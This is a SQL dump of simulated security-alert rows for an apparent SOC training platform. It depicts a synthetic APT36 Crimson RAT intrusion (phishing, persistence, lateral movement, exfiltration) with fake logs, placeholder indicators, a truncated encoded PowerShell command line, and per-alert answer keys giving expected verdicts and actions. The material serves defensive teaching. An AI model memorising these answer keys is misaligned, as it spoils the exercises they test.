'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1149, 'Suspicious Email Detected', 'medium', 'Email Gateway Logs', 'An email resembling official communication was intercepted. It is suspected of being a phishing attempt by APT36 to gain initial access. The email was sent from a known malicious IP address and contains an attachment with a suspicious hash.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"email_id\":\"9876543210\",\"sender_email\":\"support@fakeservice.com\",\"recipient_email\":\"user@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_12345.pdf\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"sender_ip\":\"203.0.113.45\",\"recipient_ip\":\"192.168.1.10\",\"email_gateway\":\"gateway01.company.com\",\"alert_flag\":true}', '2026-02-07 21:13:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known phishing campaigns by APT36.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with malware delivery.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@fakeservice.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Email Blacklist\",\"verdict\":\"suspicious\",\"details\":\"Email domain frequently used in phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected\",\"date\":\"2026-02-08T19:00:00.282Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1150, 'Crimson RAT Executed', 'high', 'Endpoint Detection and Response (EDR)', 'Crimson RAT was executed on the victim\'s machine following an initial access through a phishing email. This malware is known for its capabilities to steal information and remotely control infected systems.', 'Malware Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:35:27Z\",\"event_type\":\"process_execution\",\"machine_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"process_name\":\"CrimsonRAT.exe\",\"process_id\":5123,\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":1024,\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\CrimsonRAT.exe\",\"attacker_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\CrimsonRAT.exe\"}', '2026-02-07 21:13:34', '2026-02-23 20:01:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the victim\'s machine\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"Username associated with the affected machine\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Crimson RAT malware\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"CrimsonRAT.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware 
Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable name associated with Crimson RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1151, 'Backdoor Persistence Established', 'high', 'System Registry Logs', 'APT36 has established a persistent backdoor using Crimson RAT by modifying the Windows Registry to ensure continued access to the compromised system. This allows the attacker to maintain a foothold within the network even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'resolved', NULL, '{\"time\":\"2023-10-15T14:32:17Z\",\"registry_key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_key_value\":\"CrimsonRAT\",\"registry_key_data\":\"C:\\\\Windows\\\\System32\\\\CrimsonRAT.exe\",\"user\":\"admin_user\",\"source_ip\":\"192.168.1.25\",\"attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"admin_user\"}', '2026-02-07 21:13:34', '2026-02-23 20:07:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash of Crimson RAT binary.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address associated with APT36 command and control servers.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit Logs\",\"verdict\":\"internal\",\"details\":\"User account compromised for registry modification.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1152, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Suspicious lateral movement activity detected within the military network. A Remote Access Trojan (RAT) was used to perform internal reconnaissance and gather information on other connected systems.', 'Internal Reconnaissance', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:25:43Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"10.0.0.5\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"john.doe\",\"action\":\"lateral_movement\",\"filename\":\"svchost.exe\",\"external_attacker_ip\":\"203.0.113.55\",\"event_description\":\"Detected lateral movement with the use of RAT targeting internal systems.\"}', '2026-02-07 21:13:34', '2026-02-23 19:59:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal destination IP targeted by RAT.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known RAT used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"Username found associated with lateral movement activity.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"External attacker 
IP involved in lateral movement operation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1153, 'Data Exfiltration Alert', 'critical', 'Data Loss Prevention (DLP) System', 'Sensitive data has been detected being exfiltrated to an external server associated with APT36. The exfiltration involves critical national security data, posing a severe threat.', 'Data Theft', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"exfil_event_5678\",\"source_ip\":\"192.168.10.45\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"national_secrets.docx\",\"file_hash\":\"d4c74594d841139328695756648b6bd6\",\"action\":\"exfiltrated\",\"detection_method\":\"signature_match\",\"signature_id\":\"apt36_exfil_signature_v1\",\"severity\":\"high\"}', '2026-02-07 21:13:34', '2026-02-16 12:23:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with APT36 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"national_secrets.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"detection_system\",\"verdict\":\"sensitive\",\"details\":\"Contains classified information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d4c74594d841139328695756648b6bd6\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to suspicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"clean\",\"details\":\"Valid internal 
user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1154, 'Spear Phishing Campaign Detected', 'high', 'Email Gateway Logs', 'A spear-phishing campaign aimed at key government officials has been detected. The campaign involves emails containing malicious attachments designed to compromise Android devices.', 'Initial Access', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"email_subject\":\"Urgent: Review the Attached Document\",\"sender_email\":\"malicious.actor@threatmail.com\",\"recipient_email\":\"official@government.org\",\"attachment_name\":\"Document.apk\",\"attachment_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"malicious_domain\":\"www.malicious-download.com\",\"user_agent\":\"Mozilla/5.0 (Linux; Android 10; Mobile)\"}', '2026-02-07 21:13:37', '2026-02-23 19:24:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT spear-phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted government official\'s device\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"malicious.actor@threatmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Document.apk\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"APK file containing malicious payload targeting Android 
devices\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known Android malware\"}},{\"id\":\"artifact_6\",\"type\":\"domain\",\"value\":\"www.malicious-download.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain used for hosting malicious APKs\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Campaign Detected\",\"date\":\"2026-02-08T19:00:00.290Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1155, 'Malicious Application Execution', 'high', 'Mobile Device Management (MDM) Logs', 'Upon opening the malicious attachment, the malware is executed, establishing a foothold on the target\'s Android device, signaling the start of the espionage operation.', 'Execution', 'T1059.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-25T14:22:34Z\",\"device_id\":\"android-1234567890\",\"user\":\"jdoe@example.com\",\"event\":\"malware_execution\",\"filename\":\"malicious_app.apk\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"device_ip\":\"192.168.1.10\",\"action\":\"app_installation\",\"status\":\"success\"}', '2026-02-07 21:13:37', '2026-02-23 19:31:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"malicious_app.apk\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 50/60 engines\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPVoid\",\"verdict\":\"suspicious\",\"details\":\"Known command and control server\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 